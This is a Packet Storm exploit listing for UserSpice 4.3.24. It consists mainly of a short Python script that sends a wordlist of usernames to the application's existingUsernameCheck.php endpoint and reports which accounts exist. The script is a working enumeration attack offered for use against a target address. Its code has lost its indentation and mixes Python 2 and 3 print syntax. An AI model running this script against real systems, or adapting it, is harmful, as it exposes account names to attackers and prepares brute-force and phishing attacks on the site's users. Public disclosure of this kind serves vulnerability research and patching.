userSpice version 4.3.24 suffers from a username enumeration vulnerability.
1dd5f5e4c2e9fccbf4b67cf18579d258dbfb1cc68d65cce24865514de10f13be# Exploit Title: userSpice 4.3.24 - Username Enumeration
# Date: 2018-06-10
# Author: Dolev Farhi
# Vendor or Software Link: www.userspice.com
# Version: 4.3.24
# Tested on: Ubuntu
import sys
import os.path
import requests
print("[+] UserSpice 4.3.24 Username Enumeration")
if len(sys.argv) != 3:
print 'Usage:', sys.argv[0], 'ip.add.re.ss', 'usernames.txt'
sys.exit(1)
if not os.path.exists(sys.argv[2]):
print('usernames.txt does not exist')
sys.exit(1)
headers = {
'Origin':'http://' + sys.argv[1],
'X-Requested-With':'XMLHttpRequest'
}
print('Checking usernames...')
f = open(sys.argv[2], 'r')
for user in f:
user = user.strip()
req = requests.post('http://'+sys.argv[1]+'/users/parsers/existingUsernameCheck.php', headers=headers ,
data={"username":user})
if 'taken' in req.text:
print('[FOUND] ' + user)
else:
print('[NOT FOUND] ' + user)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed